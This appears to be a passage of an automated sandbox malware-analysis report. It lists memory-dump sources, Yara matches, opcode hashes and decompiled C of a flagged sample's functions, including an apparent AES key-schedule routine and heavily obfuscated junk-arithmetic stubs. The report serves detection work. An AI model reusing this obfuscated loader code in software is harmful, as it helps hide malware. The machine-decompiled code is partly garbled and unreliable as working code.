            0x00402e1a
            0x00402e25
            0x00402e2d
            0x00402e36
            0x00402e41
            0x00402e49
            0x00402e52
            0x00402e5d
            0x00402e65
            0x00402e6e
            0x00402e80
            0x00402e83
            0x00402f9f
            0x00402fa4
            0x00402e89
            0x00402e89
            0x00402e8c
            0x00402e8e
            0x00402e91
            0x00402e91
            0x00402ef6
            0x00402efb
            0x00402efd
            0x00402f03
            0x00402f05
            0x00402f0b
            0x00402f0d
            0x00402f10
            0x00402f16
            0x00000000
            0x00000000
            0x00402f72
            0x00402f78
            0x00402f7a
            0x00402f80
            0x00402f82
            0x00402f87
            0x00402f88
            0x00402f8b
            0x00402f8e
            0x00402f91
            0x00402f97
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00402f97
            0x00402fae
            0x00402fae
            0x00000000

            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
            • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
            • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 99fbeadb31e037a38a4927daf7e0d8ac2e5cd47a127740585f1703ed90c48254
            • Instruction ID: f9492f3af6f08cd2ecca4c7cf3cd7d69ffed67b405af7241e6593ba2b66022cd
            • Opcode Fuzzy Hash: 99fbeadb31e037a38a4927daf7e0d8ac2e5cd47a127740585f1703ed90c48254
            • Instruction Fuzzy Hash: C551F170A0060AEFDB04DF64C964BBFB7B5FF54311F10412AE422976A0DB74A955CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e071a218df035798d556e04d7a041afcbba84b84a005531a9e7e5ff35d1ae27d
            • Instruction ID: c8979917871b2ab231d157749fc2e9db59ed74d411fe29bf6ae2a82744baed18
            • Opcode Fuzzy Hash: e071a218df035798d556e04d7a041afcbba84b84a005531a9e7e5ff35d1ae27d
            • Instruction Fuzzy Hash: CA513732A11684EFDB269F96CD40B7B737AFF90750F184469F9158B261CA78DD01CB80
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 17c672f25a8d81aee7f85323b0e953a54142d922c011bc6a02bc891d2fd58c3f
            • Instruction ID: e7ab32afde61abfd94f0cc07f60c0ca5f4665802320dc17a97a647f06ad4145e
            • Opcode Fuzzy Hash: 17c672f25a8d81aee7f85323b0e953a54142d922c011bc6a02bc891d2fd58c3f
            • Instruction Fuzzy Hash: 3F51F431A157428FD315DF28C695BAAB7E0FF82314F184469E8468B2D3EB75EC05CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 380bc034c2280aa666816a7c652e82654e3818f9d7f74758e012ab12d19db2b3
            • Instruction ID: 3e4f2e0d56ed8562a3aae86ed7b4f56eea2917c7e774f5cc8ca76b0dc811183a
            • Opcode Fuzzy Hash: 380bc034c2280aa666816a7c652e82654e3818f9d7f74758e012ab12d19db2b3
            • Instruction Fuzzy Hash: ED51EE31205781ABC322DF68C942B2BB7E4FF94714F10092EF5A583652E774EC04C791
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00402D87(void* __eax, intOrPtr _a4, signed int* _a12, signed int* _a16, intOrPtr _a20) {
            				signed char _v1957312885;
            				signed int _t71;
            				signed int* _t76;
            				signed int* _t89;
            				signed int _t102;
            				signed int _t104;
            				signed int _t114;
            				signed int _t116;
            				signed int* _t119;
            				signed int _t136;
            				signed int _t138;
            				signed int _t142;
            				signed int _t163;
            				intOrPtr _t185;
            
            				 *((char*)(__eax - 0x2e)) =  *((char*)(__eax - 0x2e)) + 0x66;
            				_v1957312885 = _v1957312885 << 0xec;
            				_t89 = _a16;
            				_t119 = _a12;
            				asm("ror esi, 0x8");
            				asm("rol eax, 0x8");
            				 *_t119 =  *_t89 & 0xff00ff00 |  *_t89 & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[1] = _t89[1] & 0xff00ff00 | _t89[1] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[2] = _t89[2] & 0xff00ff00 | _t89[2] & 0x00ff00ff;
            				_t71 =  &(_t119[1]);
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[3] = _t89[3] & 0xff00ff00 | _t89[3] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[4] = _t89[4] & 0xff00ff00 | _t89[4] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[5] = _t89[5] & 0xff00ff00 | _t89[5] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t119[6] = _t89[6] & 0xff00ff00 | _t89[6] & 0x00ff00ff;
            				asm("ror esi, 0x8");
            				asm("rol ecx, 0x8");
            				_t119[7] = _t89[7] & 0xff00ff00 | _t89[7] & 0x00ff00ff;
            				if(_a20 != 0x100) {
            					L5:
            					return _t71 | 0xffffffff;
            				} else {
            					_t185 = _a4;
            					_t76 = 0;
            					_a12 = 0;
            					while(1) {
            						_t163 =  *(_t71 + 0x18);
            						_t102 = ( *(_t185 + 4 + (_t163 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t185 +  &(_t76[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t185 + 4 + (_t163 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t185 + 5 + (_t163 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t185 + 4 + (_t163 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t71 - 4);
            						_t136 =  *_t71 ^ _t102;
            						 *(_t71 + 0x1c) = _t102;
            						_t104 =  *(_t71 + 4) ^ _t136;
            						 *(_t71 + 0x20) = _t136;
            						_t138 =  *(_t71 + 8) ^ _t104;
            						 *(_t71 + 0x24) = _t104;
            						 *(_t71 + 0x28) = _t138;
            						if(_t76 == 6) {
            							break;
            						}
            						_t114 = ( *(_t185 + 4 + (_t138 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t185 + 4 + (_t138 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t185 + 4 + (_t138 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t185 + 5 + (_t138 & 0x000000ff) * 4) & 0x000000ff ^  *(_t71 + 0xc);
            						_t142 =  *(_t71 + 0x10) ^ _t114;
            						 *(_t71 + 0x2c) = _t114;
            						_t116 =  *(_t71 + 0x14) ^ _t142;
            						 *(_t71 + 0x34) = _t116;
            						_t76 =  &(_a12[0]);
            						 *(_t71 + 0x30) = _t142;
            						 *(_t71 + 0x38) = _t116 ^ _t163;
            						_t71 = _t71 + 0x20;
            						_a12 = _t76;
            						if(_t76 < 7) {
            							continue;
            						} else {
            							goto L5;
            						}
            						goto L7;
            					}
            					return 0xe;
            				}
            				L7:
            			}

















            0x00402d88
            0x00402d8c
            0x00402d93
            0x00402d98
            0x00402da0
            0x00402da9
            0x00402db3
            0x00402dba
            0x00402dc3
            0x00402dce
            0x00402dd6
            0x00402ddf
            0x00402dea
            0x00402df0
            0x00402df5
            0x00402dfe
            0x00402e09
            0x00402e11
            0x00402e1a
            0x00402e25
            0x00402e2d
            0x00402e36
            0x00402e41
            0x00402e49
            0x00402e52
            0x00402e5d
            0x00402e65
            0x00402e6e
            0x00402e80
            0x00402e83
            0x00402f9d
            0x00402fa4
            0x00402e89
            0x00402e89
            0x00402e8c
            0x00402e8e
            0x00402e91
            0x00402e91
            0x00402ef6
            0x00402efb
            0x00402efd
            0x00402f03
            0x00402f05
            0x00402f0b
            0x00402f0d
            0x00402f10
            0x00402f16
            0x00000000
            0x00000000
            0x00402f72
            0x00402f78
            0x00402f7a
            0x00402f80
            0x00402f82
            0x00402f87
            0x00402f88
            0x00402f8b
            0x00402f8e
            0x00402f91
            0x00402f97
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00402f97
            0x00402fae
            0x00402fae
            0x00000000

            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e3df5233fb1e79683e894e212f9f9b6c7dc348d7739f22301ea7fd2290962246
            • Instruction ID: e9a84c498c384631c58fae02fcb90d707ef2c22cd41e8d2aa0c4cdda4fac9000
            • Opcode Fuzzy Hash: e3df5233fb1e79683e894e212f9f9b6c7dc348d7739f22301ea7fd2290962246
            • Instruction Fuzzy Hash: 6E5183B3E14A214BD318CF09CD40635B792EFC8312B5F81BEDD199B397CA74A9529A90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bb491a8137688bb07786cabf3d45b82fa2819e47f7d9ec30fbf1c4ba806bfe54
            • Instruction ID: f589d8437e7fef043d1022fdce9c189ec8b5c66063599e4de7541f3de1318a72
            • Opcode Fuzzy Hash: bb491a8137688bb07786cabf3d45b82fa2819e47f7d9ec30fbf1c4ba806bfe54
            • Instruction Fuzzy Hash: 4F51CE79600215EFCF15DF29C590ABEB7B4EF85700B2480AAEC46DB285E739CD51CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f8ce3438f1101cf804429409a88a924125ee5dd1aaf2503930fcbb17769268b
            • Instruction ID: cd2e35e728b14d6a391f7d1106c723341df0616a3b2c1324dd27a5cff4d57c6e
            • Opcode Fuzzy Hash: 4f8ce3438f1101cf804429409a88a924125ee5dd1aaf2503930fcbb17769268b
            • Instruction Fuzzy Hash: 3B51E672A10608AFDB15CF98CD51BEEB7B5EF45310F048279E916AB1D1D7749E04CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			E0041E20E(void* __eax, void* __ebx, signed int __ecx, signed int __edx, void* __esi) {
            				signed int _t23;
            				signed int _t24;
            				char _t27;
            				signed char _t31;
            				signed int _t32;
            				signed int _t44;
            				intOrPtr _t54;
            				intOrPtr _t55;
            
            				_t32 = __ecx;
            				_t43 = __edx & 0xcc32c1de;
            				 *0x16efa8e0 =  *0x16efa8e0 | _t43;
            				asm("rol byte [0xb4a0470c], 0x18");
            				asm("sbb [0xc2ccecc9], bh");
            				_pop(_t45);
            				asm("sbb [0x16d24939], esi");
            				asm("rcr byte [0x3ccdc486], 0xc");
            				_t23 = __eax -  *0x32c1ddbd;
            				 *0x93b70016 =  *0x93b70016 >> 0xeb;
            				_t27 = __ebx - 1;
            				if(_t27 < 0) {
            					goto L1;
            					do {
            						do {
            							do {
            								do {
            									L1:
            									_t1 = _t55;
            									_t55 =  *0xb0939ff7;
            									 *0xb0939ff7 = _t1;
            									_t44 = _t43 ^  *0x748f83e7;
            									_t54 = _t54 - 1;
            									 *0xc4bbc419 =  *0xc4bbc419 ^ _t44;
            									asm("adc al, [0x759084e5]");
            									asm("adc dl, 0x63");
            									_t43 = _t44 |  *0xb00218dd;
            									asm("scasb");
            								} while (_t43 >= 0);
            								_t55 = _t55 +  *0xe77cd173;
            								asm("lodsb");
            								asm("sbb [0xef4544a1], esi");
            								asm("sbb ebx, [0x2f9d1616]");
            								 *0xa8e0cc32 =  *0xa8e0cc32 ^ _t43;
            								_t32 = _t32 &  *0xefca2585;
            								_t43 = _t43 +  *0xe0cc32b2;
            								asm("ror byte [0xa616efa8], 0x85");
            								_t23 = _t23 |  *0xa91945c6;
            								_t54 = _t54 -  *0xcc32c1da;
            								asm("adc bl, 0xe0");
            								asm("sbb [0x3916efa8], ch");
            								_t2 = _t45;
            								_t45 =  *0x997775c8;
            								 *0x997775c8 = _t2;
            								 *0xa8c4a800 =  *0xa8c4a800 >> 0;
            								asm("adc [0x16ef45d8], esi");
            							} while (_t54 != 0);
            							 *0x32c1c68f =  *0x32c1c68f >> 0x2d;
            							asm("rol dword [0xefa8e0cc], 0x57");
            							_t55 = _t55 -  *0x7bc83816;
            							 *0x4052173a =  *0x4052173a ^ _t23;
            							_push(_t23);
            							 *0x50405217 =  *0x50405217 >> 0x36;
            							 *0x81c42916 =  *0x81c42916 + _t27 +  *0xef45d88d;
            							 *0x4052173a = _t32 -  *0xf2098b7a + 0x3a;
            							_t4 = _t54;
            							_t54 =  *0xef45d88d;
            							 *0xef45d88d = _t4;
            							_t45 = 0x9cba1d16;
            							_t24 = _t23;
            							asm("adc [0xaddd0fb4], ch");
            							 *0x87dbae16 =  *0x87dbae16 >> 0x6e;
            							 *0xe7553110 =  *0xe7553110 ^ _t43;
            							_t43 = 0x32ee16ef;
            							 *0x1db40ffd =  *0x1db40ffd & _t24;
            							 *0xe0cc3283 =  *0xe0cc3283 >> 0x7c;
            							_push( *0x6d2b16ef);
            							asm("sbb edi, [0xe0cc32c1]");
            							_t23 = _t24 -  *0x8a16efa8;
            							 *0xbe17ff2f =  *0xbe17ff2f << 0x1c;
            							asm("adc ecx, 0xcc32bfdd");
            							 *0x16efa8e0 =  *0x16efa8e0 << 0xf0;
            							_t27 =  *0x2b7093ff;
            							 *0xfa34f216 =  *0xfa34f216 ^ 0x32ee16ef;
            							 *0xb9d9b004 =  *0xb9d9b004 << 0xb8;
            							 *0xa8e0cc32 =  *0xa8e0cc32 - _t27;
            							 *0x1ee67b3 =  *0x1ee67b3 ^ _t23;
            							_t32 =  *0x32c5f7c6 - 1;
            							 *0xa2f716d2 = _t27;
            						} while (_t32 <= 0);
            						 *0x36b616d2 =  *0x36b616d2 & 0x32ee16ef;
            						asm("rcl dword [0xebb8140b], 0x12");
            						_t23 = _t23 &  *0xe2aa9076 |  *0xe0cc32cc;
            						asm("sbb [0xa816efa8], cl");
            						asm("rcr byte [0xcc32c1d7], 0xc9");
            						_t43 = 0x32ee160f;
            						_t31 =  *0x9d8d8ce2 & 0x000000a8;
            						 *0xf2ba16ef = _t32 - 1;
            						_pop( *0x395fc3cc);
            						 *0x420816d2 =  *0x420816d2 << 0x7f;
            						_t55 =  *0xf2c1ab9c;
            						 *0xf2c1ab9c =  *0x9c01269e;
            						 *0xbda7983e =  *0xbda7983e & 0x9cba1d16;
            						 *0x16d24939 =  *0x16d24939 ^ 0x9cba1d16;
            						asm("adc ah, [0x71c621c]");
            						asm("movsb");
            						asm("adc eax, [0xcc32c1db]");
            						 *0x16efa8e0 = 0x32ee160f;
            						_t32 = 0x7c73a2fe;
            						_t54 =  *0x16ef45d8;
            						asm("sbb [0x9ba0f4be], ebp");
            						 *0xa899d1b4 =  *0xa899d1b4 ^ _t31;
            						_pop(_t45);
            						_t27 = 0x16d24939 + _t31;
            					} while (_t27 != 0);
            					return _t23;
            				} else {
            					__edx = __edx - 0xaf88ac70;
            					_pop(__edi);
            					asm("rcl byte [0x54942410], 0xe5");
            					asm("sbb dh, 0xb4");
            					asm("adc edi, [0x8daddd0f]");
            					__eax = __eax -  *0x16ef45d8;
            					__esp = __esp - 1;
            					 *0x897790e0 =  *0x897790e0 << 0x41;
            					asm("rcr byte [0xa8c4a800], 0x3");
            					asm("rcr dword [0x16ef45d8], 0xf0");
            					__ebx = 0x2bc09e3f;
            					 *0xb2a10f9e =  *0xb2a10f9e ^ __eax;
            					__edx = __edx ^  *0x80d68f16;
            					 *0xa8008263 =  *0xa8008263 << 0x55;
            					__ebx = 0x2bc09e3f ^  *0x45d8a8c4;
            					__edx = __edx ^  *0x121f16ef;
            					 *0xf9e2bbc =  *0xf9e2bbc & __edi;
            					asm("rcl dword [0x40ecb2a1], 0x5c");
            					__cl = __cl -  *0xcc319fe2;
            					asm("adc ebp, [0x5fc2ccf0]");
            					asm("sbb [0x16d24939], esi");
            					__ebx = (0x2bc09e3f ^  *0x45d8a8c4) -  *0x2e339416;
            					return __eax;
            				}
            			}











            0x0041e20e
            0x0041e20e
            0x0041e214
            0x0041e21a
            0x0041e221
            0x0041e227
            0x0041e228
            0x0041e22e
            0x0041e235
            0x0041e241
            0x0041e248
            0x0041e249
            0x00000000
            0x0041dfab
            0x0041dfab
            0x0041dfab
            0x0041dfab
            0x0041dfab
            0x0041dfae
            0x0041dfae
            0x0041dfae
            0x0041dfb4
            0x0041dfba
            0x0041dfc1
            0x0041dfc7
            0x0041dfce
            0x0041dfd1
            0x0041dfd7
            0x0041dfd7
            0x0041dfda
            0x0041dfe0
            0x0041dfe1
            0x0041dfe7
            0x0041dff3
            0x0041dfff
            0x0041e005
            0x0041e00b
            0x0041e012
            0x0041e018
            0x0041e01e
            0x0041e021
            0x0041e027
            0x0041e027
            0x0041e027
            0x0041e02d
            0x0041e034
            0x0041e034
            0x0041e046
            0x0041e04d
            0x0041e054
            0x0041e05a
            0x0041e060
            0x0041e070
            0x0041e07d
            0x0041e083
            0x0041e08a
            0x0041e08a
            0x0041e08a
            0x0041e090
            0x0041e096
            0x0041e097
            0x0041e0a3
            0x0041e0aa
            0x0041e0b6
            0x0041e0bc
            0x0041e0c2
            0x0041e0cc
            0x0041e0d8
            0x0041e0de
            0x0041e0e4
            0x0041e0eb
            0x0041e0f1
            0x0041e0f8
            0x0041e10a
            0x0041e110
            0x0041e117
            0x0041e123
            0x0041e12e
            0x0041e12f
            0x0041e12f
            0x0041e148
            0x0041e14e
            0x0041e155
            0x0041e15b
            0x0041e17c
            0x0041e183
            0x0041e186
            0x0041e189
            0x0041e195
            0x0041e19c
            0x0041e1a3
            0x0041e1a3
            0x0041e1b5
            0x0041e1c1
            0x0041e1c7
            0x0041e1cd
            0x0041e1ce
            0x0041e1d4
            0x0041e1e5
            0x0041e1e8
            0x0041e1ee
            0x0041e1f4
            0x0041e1fa
            0x0041e1fb
            0x0041e1fb
            0x0041e20d
            0x0041e24f
            0x0041e24f
            0x0041e255
            0x0041e25c
            0x0041e263
            0x0041e266
            0x0041e26c
            0x0041e272
            0x0041e273
            0x0041e27a
            0x0041e281
            0x0041e288
            0x0041e28e
            0x0041e29a
            0x0041e2a0
            0x0041e2a7
            0x0041e2ad
            0x0041e2b3
            0x0041e2b9
            0x0041e2c6
            0x0041e2cc
            0x0041e2d2
            0x0041e2d8
            0x0041e2de
            0x0041e2de

            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a19050ae592095a85df3fd2118265195607882bdbf36f698c9e9f9947bea27ed
            • Instruction ID: 23e2bbe1d447a053acb060f5f0a2c009adc6abda4cda1498559cced72c146633
            • Opcode Fuzzy Hash: a19050ae592095a85df3fd2118265195607882bdbf36f698c9e9f9947bea27ed
            • Instruction Fuzzy Hash: 4081D13294D3D1CFE702EF38E8E66853FB1E786324749478DC9A15B1D2C76421AACB85
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
            • Instruction ID: 22a60172e166f30d57639ab87abeb96426373bd2060986fe16631c1839aad765
            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
            • Instruction Fuzzy Hash: 2451A071600606EFCB25CF14D580A96FBB9FF85304F14C1BAE9089F252E3B1E945CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7dbf15d66d92f6921fd717835889e9cf08ba49335a12495e0102cef50db032d2
            • Instruction ID: 00ffdac525df809bcf7e456e50d4fc5ec03e0ec6a67d704e0b85d99bb7611de7
            • Opcode Fuzzy Hash: 7dbf15d66d92f6921fd717835889e9cf08ba49335a12495e0102cef50db032d2
            • Instruction Fuzzy Hash: 1D41E43470429B9FDF14CF2DC4916BABBF1EF99300F14855AE9868B346D3349865DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 76a224fb57045b848c55fb246e7e0a4a0c32cd08619ed057fd12e7e19c808d36
            • Instruction ID: 6dd680c13f1f966e783b5f74f077f3b88dd72b4bec6bb14d7886c0c10fba7f86
            • Opcode Fuzzy Hash: 76a224fb57045b848c55fb246e7e0a4a0c32cd08619ed057fd12e7e19c808d36
            • Instruction Fuzzy Hash: 3341263A608752EBC321EF29CD80F6AB7A4AF84714F110E29F99687292E730DC41D7D5
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c7d7adceda7e1fb28087d3ab16a30d3b150daaf204e1d863e818cfeb94d18ee5
            • Instruction ID: 394815542d318351b276fda7b3813fd4c2214845a222518c19d087d80e87ceb9
            • Opcode Fuzzy Hash: c7d7adceda7e1fb28087d3ab16a30d3b150daaf204e1d863e818cfeb94d18ee5
            • Instruction Fuzzy Hash: 9641CD39910259DBCF15DFAAC440AEEB7B5BF48B00F25816AF805EB350D7369D41CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0af6bc836b230dc243b65d0c1096e9b524f84640acb34d4c21ad8bd61cfb0863
            • Instruction ID: 990314f4875062a7633348907d5c20b406d4fe05ac6625325c8c7c5e56102ff4
            • Opcode Fuzzy Hash: 0af6bc836b230dc243b65d0c1096e9b524f84640acb34d4c21ad8bd61cfb0863
            • Instruction Fuzzy Hash: 01410973B101095BC714DF68C885BFBB7ADEF49320B14866AE915C7282DB34DD06C790
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1eddfb490b0821e5b9bd0efd97d17e77e9ba9fda4411338d5e0c9e803b039a44
            • Instruction ID: 69b6d0db1f6f1bc38a2dbb7ec7af72701aecf0f2e79ca6eb2e30d9722c6c7334
            • Opcode Fuzzy Hash: 1eddfb490b0821e5b9bd0efd97d17e77e9ba9fda4411338d5e0c9e803b039a44
            • Instruction Fuzzy Hash: 8041BD71A01209EFDB319FA8D840BEEB7B5BF88754F24052AE841F7292DB74DC448B90
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: be3b4a51cfa3edcff81842d127ee4f292402115a8f3185dbd1a32f25bb9fad36
            • Instruction ID: 482a42c0b7c9fd94b52884be3797e1980e8065a4262d902837ac50a0a339b3ce
            • Opcode Fuzzy Hash: be3b4a51cfa3edcff81842d127ee4f292402115a8f3185dbd1a32f25bb9fad36
            • Instruction Fuzzy Hash: 8741DD36A00915EBCB25DF68CE51BAF7779EF44710F19C078E90A9B281D631EE01C7A0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a918b563e8bd643dd0536311c27e8d6a357502ad766b1e4be2c52113580d236a
            • Instruction ID: 15c5d2fecf389c191c486aacedd753263b9c80bc42ad3a86020744d0eb0df15b
            • Opcode Fuzzy Hash: a918b563e8bd643dd0536311c27e8d6a357502ad766b1e4be2c52113580d236a
            • Instruction Fuzzy Hash: 63416C326083569ED312DF65D841A6BB7E9EF88B94F00092EF990D7251E730DE548BA3
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f7f52354ee06bfe05375add4c7059e23f6df07e4959a3149db6e1b47e5d1eafe
            • Instruction ID: 9e92a47635952cb857a658795c0aa01ef977640ecf03facce6436646ff9c4249
            • Opcode Fuzzy Hash: f7f52354ee06bfe05375add4c7059e23f6df07e4959a3149db6e1b47e5d1eafe
            • Instruction Fuzzy Hash: 6E41B171E0012A9BCB10DFA9C881ABEB7F5FF89314B15422AE856E7280D730ED01CBD0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 3fdd712a2fa0cfcb15263e76a605d83d9ed9224d7ed9c5f299158a8fb8885060
            • Instruction ID: 90cf75e3a0158c21ccfef4cf7bdd3df25c73bbe65ca106552afae0853800639c
            • Opcode Fuzzy Hash: 3fdd712a2fa0cfcb15263e76a605d83d9ed9224d7ed9c5f299158a8fb8885060
            • Instruction Fuzzy Hash: CA414B76E002A59BCF26DF5A8480BB9B370EBD5724F25806AFD458B280E6359F41C390
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 837042bcd42e7f2763c1847c81ebfec80d3801e0199c091820d890288e8c9757
            • Instruction ID: f573c6dd1e42ad4f3012a38e5968d3d9060bd69d37f7fabe72ce742d7dfc473f
            • Opcode Fuzzy Hash: 837042bcd42e7f2763c1847c81ebfec80d3801e0199c091820d890288e8c9757
            • Instruction Fuzzy Hash: CC41CD31A49208DFCF11DFA8D9807BA77B9BF95354F240616E412AB293C3348E41CB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 65%
            			E0041DFA8(signed int __eax, char __ebx, signed int __ecx, signed char __edx, intOrPtr __edi) {
            				char _v5;
            				signed int _t20;
            				signed int _t21;
            				char _t23;
            				signed char _t27;
            				signed int _t28;
            				signed int _t39;
            				intOrPtr _t50;
            				intOrPtr _t53;
            
            				_t40 = __edi;
            				_t38 = __edx;
            				_t28 = __ecx;
            				_t23 = __ebx;
            				_t20 = __eax;
            				goto L1;
            				do {
            					do {
            						do {
            							do {
            								L1:
            								_t1 = _t53;
            								_t53 =  *0xb0939ff7;
            								 *0xb0939ff7 = _t1;
            								_t39 = _t38 ^  *0x748f83e7;
            								 *0xc4bbc419 =  *0xc4bbc419 ^ _t39;
            								asm("adc al, [0x759084e5]");
            								asm("adc dl, 0x63");
            								_t38 = _t39 |  *0xb00218dd;
            								asm("scasb");
            							} while (_t38 >= 0);
            							_t53 = _t53 +  *0xe77cd173;
            							asm("lodsb");
            							asm("sbb [0xef4544a1], esi");
            							asm("sbb ebx, [0x2f9d1616]");
            							 *0xa8e0cc32 =  *0xa8e0cc32 ^ _t38;
            							_t28 = _t28 &  *0xefca2585;
            							_t38 = _t38 +  *0xe0cc32b2;
            							asm("ror byte [0xa616efa8], 0x85");
            							_t20 = _t20 |  *0xa91945c6;
            							_t50 =  &_v5 -  *0xcc32c1da;
            							asm("adc bl, 0xe0");
            							asm("sbb [0x3916efa8], ch");
            							_t2 = _t40;
            							_t40 =  *0x997775c8;
            							 *0x997775c8 = _t2;
            							 *0xa8c4a800 =  *0xa8c4a800 >> 0;
            							asm("adc [0x16ef45d8], esi");
            						} while (_t50 != 0);
            						 *0x32c1c68f =  *0x32c1c68f >> 0x2d;
            						asm("rol dword [0xefa8e0cc], 0x57");
            						_t53 = _t53 -  *0x7bc83816;
